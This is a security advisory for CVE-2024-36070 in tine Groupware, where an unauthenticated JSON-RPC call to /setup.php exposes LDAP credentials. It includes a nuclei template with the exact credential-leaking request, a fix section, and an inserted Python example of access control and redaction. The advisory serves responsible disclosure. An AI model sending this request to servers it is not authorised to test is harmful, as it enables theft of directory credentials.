usd-2024-0002 | Password Leakage in tine 2023.11.2

Product: tine Groupware
Affected Version: prior to 2023.11.8
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Security Risk: High
Vendor: Tine Groupware
Vendor URL: https://www.tine-groupware.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-36070
CVE Link: https://nvd.nist.gov/vuln/detail/cve-2024-36070

Description

Tine Groupware is an open-source web application designed to enhance collaboration and productivity in a team or organization. It offers a wide range of features such as email, calendar, address book, task management, and file sharing.
If the application is configured to use an LDAP backend, the LDAP credentials are exposed to unauthorized users.

Proof of Concept

The /setup.php endpoint leaks the LDAP password through the Setup.getAllRegistryData JSON-RPC method, which can be called without authentication.
An example nuclei template was created to check for unauthorized access to the method:

id: tine20-unauth-ldap-password-leak
info:
  name: Unauthenticated LDAP password leak
  author: ChristianPoeschl
  severity: high
  description: tine leaks LDAP password to unauthenticated users
http:
  - raw:
      - |
        POST /setup.php HTTP/1.1
        Host: {{Hostname}}
        X-Tine20-Request-Type: JSON

        {"jsonrpc":"2.0","method":"Setup.getAllRegistryData","params":{},"id":2}
    matchers:
      - type: word
        condition: and
        words:
          - authenticationData
          - configExists
          - '"backend":"Ldap"'

Fix

Ensure proper access control.

Users of Tine Groupware should update to a current, patched version.
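The access-control fix above, as an added Python illustration that is not tine's code: a JSON-RPC handler that rejects Setup.getAllRegistryData without a setup session, masks secret keys before anything is returned (defence in depth), and a check that flags a response carrying the advisory's indicators together with an unmasked password. The registry structure, the allow-list PUBLIC_SETUP_METHODS and all sample values are assumptions made for this example.

```python
import json

# Constructed sample of the registry payload an LDAP-configured instance might
# return (made-up values, not real data or tine's actual structure).
SAMPLE_REGISTRY = {
    "configExists": True,
    "authenticationData": {"authentication": {
        "backend": "Ldap", "host": "ldap.example.test",
        "username": "cn=svc,dc=example,dc=test", "password": "not-a-real-password",
    }},
}
SECRET_KEYS = {"password", "bindpw", "bindpassword", "secret"}
# Hypothetical allow-list of setup methods usable without a setup session;
# empty here, so every setup.php method requires authentication.
PUBLIC_SETUP_METHODS = frozenset()


def redact_secrets(obj):
    """Recursively mask values stored under secret-looking keys."""
    if isinstance(obj, dict):
        return {k: "***" if k.lower() in SECRET_KEYS else redact_secrets(v)
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact_secrets(v) for v in obj]
    return obj


def handle_setup_rpc(raw_request: str, setup_authenticated: bool) -> dict:
    """Authorize the JSON-RPC method first, then redact whatever is returned."""
    req = json.loads(raw_request)
    method, rid = req.get("method"), req.get("id")
    if not setup_authenticated and method not in PUBLIC_SETUP_METHODS:
        # Server-defined JSON-RPC error; the registry data is never assembled.
        return {"jsonrpc": "2.0", "id": rid,
                "error": {"code": -32000, "message": "setup authentication required"}}
    if method == "Setup.getAllRegistryData":
        return {"jsonrpc": "2.0", "id": rid, "result": redact_secrets(SAMPLE_REGISTRY)}
    return {"jsonrpc": "2.0", "id": rid,
            "error": {"code": -32601, "message": "Method not found"}}


def leaks_ldap_credentials(response: dict) -> bool:
    """Check a response for the advisory's indicators plus an unmasked secret."""
    result = response.get("result")
    if not isinstance(result, dict) or "authenticationData" not in result:
        return False
    auth = json.dumps(result["authenticationData"])
    return '"backend": "Ldap"' in auth and redact_secrets(result) != result
```

Run leaks_ldap_credentials over captured responses from a test instance to confirm that, after patching, neither an unauthenticated nor an authenticated call returns an unmasked LDAP secret.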

References

Timeline

  • 2022-04-04: First contact request via info@metaways.de
  • 2024-04-09: Vulnerability is fixed by the vendor; a patched release is planned.
  • 2024-04-11: A patched release is made available on GitHub.

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.